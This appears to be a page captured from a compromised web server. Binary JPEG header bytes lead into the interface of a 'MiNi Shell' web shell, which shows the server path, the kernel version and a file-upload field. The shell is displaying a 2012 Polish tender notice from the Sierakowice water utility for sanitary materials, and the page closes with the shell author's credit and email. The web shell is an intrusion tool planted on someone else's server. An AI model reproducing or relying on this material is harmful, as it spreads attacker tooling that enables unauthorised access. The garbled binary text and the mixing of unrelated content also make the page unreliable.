JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/181280-N-2012.html

<p class="kh_header"><b>Sierakowice: Dostawa materiałów sanitarnych.</b><br>
<b>Numer ogłoszenia: 181280 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o. o. , ul. Kartuska 12, 83-340 Sierakowice, woj. pomorskie, tel. 0-58 684 73 41, faks 0-58 684 73 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.sierakowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów sanitarnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest
dostawa następujących materiałów sanitarnych na potrzeby działalności PWiK w Sierakowicach: Część I -
materiały wewnętrzne 1. Wodomierze skrzydełkowe mokrobieżne glicerynowe 1 cal 10 2. Wodomierze
skrzydełkowe mokrobieżne glicerynowe do zabudowy poziomej 0,75 cala 500 3. Wodomierze
skrzydełkowe mokrobieżne glicerynowe do zabudowy pionowej 0,75 cala 200 4. Wodomierze skrzydełkowe
mokrobieżne glicerynowe do zabudowy poziomej 0,5 cala 200 5. Wodomierze skrzydełkowe mokrobieżne
glicerynowe do zabudowy pionowej 0,5 cala 100 6. Wskaźniki antymagnetyczne ------------- 1.500 7.
Dwudzielna obejma naprawcza do rur 0,5 cala 10 8. Dwudzielna obejma naprawcza do rur 0,75 cala 10 9.
Dwudzielna obejma naprawcza do rur 1cala 50 10. Dwudzielna obejma naprawcza do rur 1,5 cala 40 11.
Dwudzielna obejma naprawcza do rur 1,25 cala 20 12. Dwudzielna obejma naprawcza do rur 2 cale 15 13.
Nasuwka trójdzielna łącznik uniwersalny 88-98 m m 10 14. Nasuwka trójdzielna łącznik uniwersalny 108-
118 m m 10 15. Zasuwa mufowa gwintowana klinowa DN 50 20 16. Zasuwa mufowa gwintowana klinowa
DN 40 20 17. Klucz do zasuw w obudowie DN 50 20 18. Klucz do zasuw w obudowie DN 40 20 19. Zawór
antyskażeniowy typ EA 0,75 cala 100 20. Zawór antyskażeniowy typ EA 0,5 cala 100 21. Zawór
antyskażeniowy typ EA 1 cal 10 22. Nasuwka trójdzielna łącznik uniwersalny DN 80/78-108 m m 10 23.Nasuwka trójdzielna łącznik uniwersalny DN 100/108-118 m m 10 Część II - Materiały zewnętrzne Lp.
Nazwa materiału Wielkość Ilość Wodociąg 1. Rura kielichowa PCV-U SDR21 PN 10 110 mm 200 mb 2
Rura kielichowa PCV-U SDR21 PN 10 90 mm 500 mb 3 Rura PE100 SDR17 PN 10 63 mm 500 mb 4 Rura
PE100 SDR17 PN 10 40 mm 300 mb 5 Rura PE100 SDR17 PN 10 32 mm 500 mb 6 Hydrant nadziemny
DN80 ----------- 15 szt. 7 Hydrant podziemny DN80 ----------- 5 szt. 8 Zasuwa kołnierzowa 100 5 szt. 9
Zasuwa kołnierzowa 80 10 szt. 10 Kolano kołnierzowe ze stopką hydranto 15 szt. 11 Króciec
jednokołnierzowy FW O 100 10 szt. 12 Króciec jednokołnierzowy FW O 80 60 szt. 13 Nawiertka NCS
uchwyt nawiertniczy O 100 10 szt. 14 Nawiertka NCS uchwyt nawiertniczy O 80 20 szt. 15 Skrzynki uliczne
do zasuw żeliwne ----------- 50 szt. 16 Tabliczki orientacyjne zasuwowe Z ----------- 100 szt. Kanalizacja 1
Rura trzonowa studni PCV d=300mm ------------ 6 szt. 2 Rura trzonowa studni PCV d=400mm ---------- 6 szt.
3 Rura teleskopowa wraz z pokrywą d=300 --------- 20 szt. 4 Rura teleskopowa wraz z pokrywą d=400 ------
--- 10 szt. 5 Włazy żeliwne klasy C250 do 25 t 2 szt. 6 Włazy żeliwne klasy B125 do 15 t 5 szt. 7 Włazy
żeliwne klasy A15 do 5 t 5 szt. Szczegółowy zakres zamówienia obejmuje dostawę materiałów wg
załącznika nr 1 do niniejszej SIWZ. 2. Dostawa materiałów będzie odbywać się sukcesywnie, w miarę
bieżących potrzeb Zamawiającego. Zamawiający pisemnie, na min. 5 dni roboczych przed wykonaniem
dostawy określi termin, zakres oraz wskaże miejsce dostawy (w obszarze działalności Zamawiającego tj.
Gminy Sierakowice oraz Gminy Sulęczyno). Potwierdzenie odbioru materiałów odbędzie się na podstawie
dokumentu potwierdzającego ilość oraz rodzaj przekazanych Zamawiającemu materiałów. W takim
przypadku dostawa odbywać się będzie nie częściej niż 2 razy w miesiącu. Zamawiający przewiduje
możliwość odbioru przez upoważnionych pracowników Zamawiającego, poszczególnych materiałów
bezpośrednio w siedzibie Wykonawcy (w przypadku Wykonawcy posiadającego siedzibę lub magazyn w
obszarze działalności Zamawiającego tj. Gminy Sierakowice lub Gminy Sulęczyno). W takim wypadku
Zamawiający na min. 2 dni robocze przed wykonaniem dostawy, dostarczy Wykonawcy listę
zapotrzebowania na materiały. Potwierdzenie odbioru materiałów odbędzie się na podstawie dokumentu
potwierdzającego ilość oraz rodzaj przekazanych Zamawiającemu materiałów. 3. Koszt dostawy oraz
rozładunku materiałów ponosi Wykonawca. 4. Wszystkie zaoferowane przez Wykonawcę materiały muszą
posiadać świadectwa dopuszczenia stosowania w budownictwie, aprobaty techniczne i deklaracje
zgodności oraz atest PZH do wszystkich wyrobów mających kontakt z wodą pitną. Do oferty należy
załączyć formularz ofertowy (stanowiący załącznik nr 2 do niniejszej SIWZ), w którym Wykonawca określi
szczegółową specyfikację oferowanego materiału (w tym nazwę producenta). 5. Rozliczenia za
dostarczony materiał odbywać się będą raz w miesiącu tj. w terminie 7 dni od zakończenia miesiąca
Wykonawca wystawi oraz dostarczy do siedziby Zamawiającego fakturę VAT, za materiał
odebrany/dostarczony w poprzednim okresie rozliczeniowym (poprzednim miesiącu). 6. Zamawiający
zastrzega sobie możliwość niezrealizowania 20 % całości zamówienia. 7. Wykonawca zobowiązany jest
udzielić, co najmniej 24 miesięcznej gwarancji na wszystkie materiały będące przedmiotem zamówienia...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zgodny z zamówieniem podstawowym w zakresie do 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.16.00.00-9, 44.16.30.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w ww. zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w ww. zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w ww. zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w ww. zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w ww. zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144. ustawy Prawo zamówień publicznych zakazuje się istotnych zmian postanowień
zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że
Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji
istotnych warunków zamówienia oraz określił warunki takiej zmiany. 2. Zmiana umowy dokonana z
naruszeniem powyżej przytoczonego przepisu jest nieważna. 3. Zgodnie z powyższym, Zamawiający
przewiduje możliwość wprowadzenia zmian w następujących przypadkach: a) zaistnienia po zawarciu
umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie
zewnętrzne wobec łączącej strony więzi prawnej: - charakterze niezależnym od stron, - którego strony nie
mogły przewidzieć przed zawarciem umowy, - którego nie można uniknąć ani któremu strony nie mogły
zapobiec przy zachowaniu należytej staranności, - której nie można przypisać drugiej stronie; Za siłę
wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski
żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków
atmosferycznych, promieniowanie lub skażenia. b) okoliczności niezależnych od stron lub nieznanych
stronom umowy w chwili jej zawarcia, takich jak: atmosferyczne, wynikające z postępu technicznego
umożliwiającego zastosowanie nowych rozwiązań technicznych i technologicznych z korzyścią dla
zamawiającego, c) zmiany powszechnie obowiązujących przepisów prawa, norm w zakresie mającym
wpływ na realizację przedmiotu zamówienia lub świadczenia stron, w tym w przypadku zmiany
obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmiany wynagrodzenia o kwotę
równą różnicy w kwocie podatku VAT, d) w przypadku zmiany podatku akcyzowego, Zamawiający
dopuszcza możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie tego podatku, 4.
Zamawiający określił warunki umowy na realizację zamówienia w niniejszym postępowaniu w Projekcie
Umowy, który stanowi załącznik nr 6 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.sierakowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo
Wodociągów i Kanalizacji Sp. z o.o. ul. Kartuska 12, 83-340 Sierakowice, I piętro , sekretariat,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 10:30, miejsce: Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. ul. Kartuska 12, 83-340
Sierakowice, I piętro , sekretariat,..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - materiały wewnętrzne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z załącznikiem nr 1 do SIWZ pn. Część I - materiały wewnętrzne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.00.00-9, 44.16.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Materiały zewnętrzne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z załącznikiem nr 1 do SIWZ pn. Część II - materiały zewnętrzne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.00.00-9, 44.16.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com